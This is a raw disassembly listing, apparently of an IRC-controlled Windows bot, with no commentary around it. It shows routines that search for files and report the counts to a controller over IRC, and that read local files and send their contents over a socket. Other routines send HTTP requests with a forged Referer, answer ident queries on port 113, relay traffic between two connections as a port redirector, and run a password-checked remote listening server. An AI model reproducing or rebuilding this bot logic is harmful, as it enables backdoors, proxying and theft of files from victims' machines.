lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
cmp [ebp+arg_8], ebx
jz short loc_4109BC
push 7D0h
call ds:dword_4F534C ; Sleep
loc_4109BC: ; CODE XREF: sub_4103EB+22B�j
; sub_4103EB+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+Str]
call ds:dword_4F53EC ; FindNextFileA
test eax, eax
jnz loc_410610
loc_4109D4: ; CODE XREF: sub_4103EB+21A�j
push [ebp+Str]
call ds:dword_4F53E0 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_410A17
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_410A4B
; ---------------------------------------------------------------------------
loc_410A17: ; CODE XREF: sub_4103EB+5F5�j
cmp [ebp+Source], ebx
jz short loc_410A31
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_410A4B
; ---------------------------------------------------------------------------
loc_410A31: ; CODE XREF: sub_4103EB+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax ; Dest
call _sprintf
add esp, 10h
loc_410A4B: ; CODE XREF: sub_4103EB+62A�j
; sub_4103EB+644�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4103EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A71 proc near ; CODE XREF: sub_40FFB1+13C�p
Dst = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_4F53C0 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410B29
push esi
push ebx
call ds:dword_4F53DC ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_410B22
loc_410AB6: ; CODE XREF: sub_410A71+AF�j
push 400h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_410AD3
mov edi, [ebp+arg_4]
loc_410AD3: ; CODE XREF: sub_410A71+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_4F53F4 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Dst]
push edi
push eax
push ebx
call ds:dword_4F53BC ; ReadFile
push esi
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_410B1D
call dword_4E308C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_410B22
xor eax, eax
loc_410B1D: ; CODE XREF: sub_410A71+9B�j
sub [ebp+arg_4], eax
jnz short loc_410AB6
loc_410B22: ; CODE XREF: sub_410A71+43�j
; sub_410A71+A8�j
push ebx
call ds:dword_4F533C ; CloseHandle
loc_410B29: ; CODE XREF: sub_410A71+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_410A71 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_410B2E(char *Str)
sub_410B2E proc near ; CODE XREF: sub_410134+181�p
Str = dword ptr 4
push esi
push edi
mov edi, [esp+8+Str]
xor esi, esi
push edi ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_410B57
loc_410B41: ; CODE XREF: sub_410B2E+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_410B4B
mov byte ptr [esi+edi], 2Fh
loc_410B4B: ; CODE XREF: sub_410B2E+17�j
push edi ; Str
inc esi
call _strlen
cmp esi, eax
pop ecx
jb short loc_410B41
loc_410B57: ; CODE XREF: sub_410B2E+11�j
mov eax, edi
pop edi
pop esi
retn
sub_410B2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410B5C(int,char *Str,int,int,int,int,int,int,int)
sub_410B5C proc near ; CODE XREF: sub_401CC7+5318�p
var_4A0 = byte ptr -4A0h
Dest = byte ptr -310h
Format = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_4E3068 ; WSAStartup
push 6
push 1
push 2
call dword_4E3178 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_14]
call dword_4E30F8 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AE55
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_410C39
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410BD5
mov eax, offset dword_4E5E88
loc_410BD5: ; CODE XREF: sub_410B5C+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+Format]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Format]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Format]
push eax
push ebx
call dword_4E3148 ; send
push esi ; Size
lea eax, [ebp+Format]
push edi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+Format]
push edi
push esi
push eax
push ebx
call dword_4E3110 ; recv
pop esi
loc_410C39: ; CODE XREF: sub_410B5C+6B�j
push ebx
call dword_4E3190 ; closesocket
call dword_4E3050 ; WSACleanup
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_410C79
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_410C79: ; CODE XREF: sub_410B5C+102�j
pop edi
pop ebx
leave
retn
sub_410B5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C7D proc near ; DATA XREF: WinMain(x,x,x,x)+445�o
; sub_401CC7+4363�o
Str = byte ptr -238h
Dest = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_8], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 71h
call dword_4E30F8 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_4E3178 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410DE1
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_456024[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E3124 ; bind
cmp eax, 0FFFFFFFFh
jz loc_410DE1
push 5
push ebx
call dword_4E3120 ; listen
cmp eax, 0FFFFFFFFh
jz loc_410DE1
mov [ebp+var_C], edi
mov edi, 200h
loc_410D08: ; CODE XREF: sub_410C7D+EA�j
; sub_410C7D+14D�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_4E318C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_410DDC
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Str]
push offset asc_44AF64 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415C3F
add esp, 14h
lea eax, [ebp+Str]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4E3110 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410D08
lea eax, [ebp+Str]
push esi ; int
push eax ; Str
call sub_418C98
push 0Ch ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push esi ; Str1
push esi ; int
lea eax, [ebp+Dest]
push 2 ; int
push eax ; Dest
call sub_40B44F
add esp, 24h
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jz loc_410D08
mov [ebp+var_8], 1
jmp loc_410D08
; ---------------------------------------------------------------------------
loc_410DDC: ; CODE XREF: sub_410C7D+A0�j
cmp [ebp+var_8], esi
jnz short loc_410E08
loc_410DE1: ; CODE XREF: sub_410C7D+47�j
; sub_410C7D+6B�j ...
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Str]
push offset asc_44AFA8 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415C3F
add esp, 10h
loc_410E08: ; CODE XREF: sub_410C7D+162�j
push ebx
call dword_4E3190 ; closesocket
push [ebp+var_4]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_410C7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E2B proc near ; DATA XREF: sub_401CC7+61BC�o
Source = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_44]
call dword_4E30F8 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call dword_4E3178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410F97
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov dword_456024[ecx], eax
call dword_4E3008 ; WSAAsyncSelect
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4E3124 ; bind
test eax, eax
jnz loc_410F97
push 0Ah
push [ebp+arg_0]
call dword_4E3120 ; listen
test eax, eax
jnz loc_410F97
loc_410EDB: ; CODE XREF: sub_410E2B+C6�j
; sub_410E2B+147�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call dword_4E318C ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410EDB
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44AFD4 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B756
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov dword_45601C[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_410FBC
push esi
push esi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_45602C[ecx], eax
jz short loc_410F82
loc_410F6F: ; CODE XREF: sub_410E2B+155�j
cmp [ebp+var_30], esi
jnz loc_410EDB
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_410F6F
; ---------------------------------------------------------------------------
loc_410F82: ; CODE XREF: sub_410E2B+142�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B01C ; "-"
call sub_415CB3
pop ecx
pop ecx
jmp short loc_410F9A
; ---------------------------------------------------------------------------
loc_410F97: ; CODE XREF: sub_410E2B+63�j
; sub_410E2B+97�j ...
mov edi, [ebp+arg_0]
loc_410F9A: ; CODE XREF: sub_410E2B+16A�j
push edi
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call dword_4E3190 ; closesocket
push [ebp+var_40]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_410E2B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FBC proc near ; DATA XREF: sub_410E2B+124�o
var_1344 = byte ptr -1344h
Source = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
Dst = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_4E3178 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_411172
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4E30F8 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_41104C
lea eax, [ebp+var_13C]
push eax
call dword_4E317C ; gethostbyname
jmp short loc_41105A
; ---------------------------------------------------------------------------
loc_41104C: ; CODE XREF: sub_410FBC+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4E30B0 ; gethostbyaddr
loc_41105A: ; CODE XREF: sub_410FBC+8E�j
cmp eax, edi
jz loc_411172
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+Dst]
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_411172
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44B058 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B756
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_456024[ebx]
mov dword_45601C[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_456028[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_4111A3
push edi
push edi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_45602C[ecx], eax
jz short loc_41115F
loc_41110C: ; CODE XREF: sub_410FBC+15D�j
cmp [ebp+var_20], edi
jnz short loc_41111B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_41110C
; ---------------------------------------------------------------------------
loc_41111B: ; CODE XREF: sub_410FBC+153�j
mov ebx, 1000h
loc_411120: ; CODE XREF: sub_410FBC+19F�j
push ebx ; Size
lea eax, [ebp+var_1344]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_4E3110 ; recv
cmp eax, edi
jle short loc_411172
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_411120
jmp short loc_411172
; ---------------------------------------------------------------------------
loc_41115F: ; CODE XREF: sub_410FBC+14E�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B09C ; "-"
call sub_415CB3
pop ecx
pop ecx
loc_411172: ; CODE XREF: sub_410FBC+44�j
; sub_410FBC+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_456024[eax]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call dword_4E3190 ; closesocket
push [ebp+var_4]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_410FBC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111A3 proc near ; DATA XREF: sub_410FBC+130�o
Dst = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_4111DA: ; CODE XREF: sub_4111A3+7C�j
push edi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 0
push edi
push eax
push dword_456028[esi]
call dword_4E3110 ; recv
test eax, eax
jle short loc_411221
push 0
push eax
lea eax, [ebp+Dst]
push eax
push dword_456024[esi]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4111DA
loc_411221: ; CODE XREF: sub_4111A3+61�j
push dword_456028[esi]
call dword_4E3190 ; closesocket
push [ebp+var_14]
call sub_40BA72
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_4111A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411240 proc near ; DATA XREF: sub_4114CE+1BE�o
var_3D4 = byte ptr -3D4h
Str1 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
Dest = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
Args = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_456024[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_4E30E0 ; select
test eax, eax
jnz short loc_4112C4
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4112C4: ; CODE XREF: sub_411240+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_4E3110 ; recv
lea eax, [ebp+Args]
push 10h
push eax
push dword ptr [esi]
call sub_411445
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_411445
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_411445
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_4E304C ; getpeername
test eax, eax
jz short loc_41133D
call dword_4E308C ; WSAGetLastError
push eax ; Args
push offset asc_44B0DC ; "-"
call sub_415CB3
push [ebp+arg_0]
call sub_40BA72
add esp, 0Ch
push edi
call ds:dword_4F53A0 ; ExitThread
loc_41133D: ; CODE XREF: sub_411240+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_4E30B0 ; gethostbyaddr
cmp eax, edi
jnz short loc_411367
push [ebp+var_18]
call dword_4E3184 ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
jmp short loc_411375
; ---------------------------------------------------------------------------
loc_411367: ; CODE XREF: sub_411240+10D�j
push dword ptr [eax] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
loc_411375: ; CODE XREF: sub_411240+125�j
pop ecx
pop ecx
push edi
push ebx
push offset dword_4E5E9C
push dword ptr [esi]
call dword_4E3148 ; send
cmp dword_4E5E94, edi
jnz short loc_4113D7
push [ebp+var_18]
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Args]
push eax ; Args
call sub_41149F
add esp, 10h
test eax, eax
jnz short loc_4113D7
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_4E3148 ; send
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4113D7: ; CODE XREF: sub_411240+14C�j
; sub_411240+16D�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_44B11C ; "-"
call sub_415CB3
push [ebp+arg_0]
call sub_411756
add esp, 10h
test eax, eax
jnz short loc_41141E
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B144 ; "-"
call sub_415CB3
push [ebp+arg_0]
call sub_40BA72
add esp, 0Ch
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41141E: ; CODE XREF: sub_411240+1B9�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_44B170 ; "-"
call sub_415CB3
push [ebp+arg_0]
call sub_40BA72
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
sub_411240 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411445 proc near ; CODE XREF: sub_411240+9A�p
; sub_411240+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
cmp eax, 1
jnz short loc_411495
mov esi, [ebp+arg_4]
loc_411463: ; CODE XREF: sub_411445+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_41148A
test al, al
jz short loc_411499
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
cmp eax, 1
jz short loc_411463
jmp short loc_411495
; ---------------------------------------------------------------------------
loc_41148A: ; CODE XREF: sub_411445+27�j
push offset asc_44B19C ; "-"
call sub_415CB3
pop ecx
loc_411495: ; CODE XREF: sub_411445+19�j
; sub_411445+43�j
xor eax, eax
jmp short loc_41149C
; ---------------------------------------------------------------------------
loc_411499: ; CODE XREF: sub_411445+2B�j
push 1
pop eax
loc_41149C: ; CODE XREF: sub_411445+52�j
pop esi
leave
retn
sub_411445 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41149F(char *Args,int,char *Str1)
sub_41149F proc near ; CODE XREF: sub_411240+163�p
Args = dword ptr 4
arg_4 = dword ptr 8
Str1 = dword ptr 0Ch
push [esp+Args] ; Str2
push [esp+4+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4114CA
push [esp+arg_4]
push [esp+4+Args] ; Args
push offset dword_44B1C8 ; Format
call sub_415CB3
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4114CA: ; CODE XREF: sub_41149F+11�j
push 1
pop eax
retn
sub_41149F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114CE proc near ; DATA XREF: sub_401CC7+23C5�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
Source = byte ptr -414h
var_214 = dword ptr -214h
Str = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_4E3068 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_411527
push eax ; Args
push offset asc_44B238 ; "-"
call sub_415CB3
push [ebp+var_4C]
call sub_40BA72
add esp, 0Ch
push edi
call ds:dword_4F53A0 ; ExitThread
loc_411527: ; CODE XREF: sub_4114CE+3A�j
push edi
push offset loc_41174C
call ds:dword_4F53F8 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_411560
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B264 ; "-"
call sub_415CB3
pop ecx
pop ecx
call dword_4E3050 ; WSACleanup
push [ebp+var_4C]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_411560: ; CODE XREF: sub_4114CE+67�j
push ebx
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_50]
call dword_4E30F8 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_4E3178 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4116D7
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_456024[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E3124 ; bind
test eax, eax
jnz loc_4116D7
push 7FFFFFFFh
push ebx
call dword_4E3120 ; listen
test eax, eax
jnz loc_4116D7
push offset unk_44B2A8
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_415C3F
pop ecx
mov [ebp+arg_0], edi
loc_4115EF: ; CODE XREF: sub_4114CE+15A�j
; sub_4114CE+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_4E318C ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4116DA
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_4115EF
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44B2E4 ; "-"
push eax ; Dest
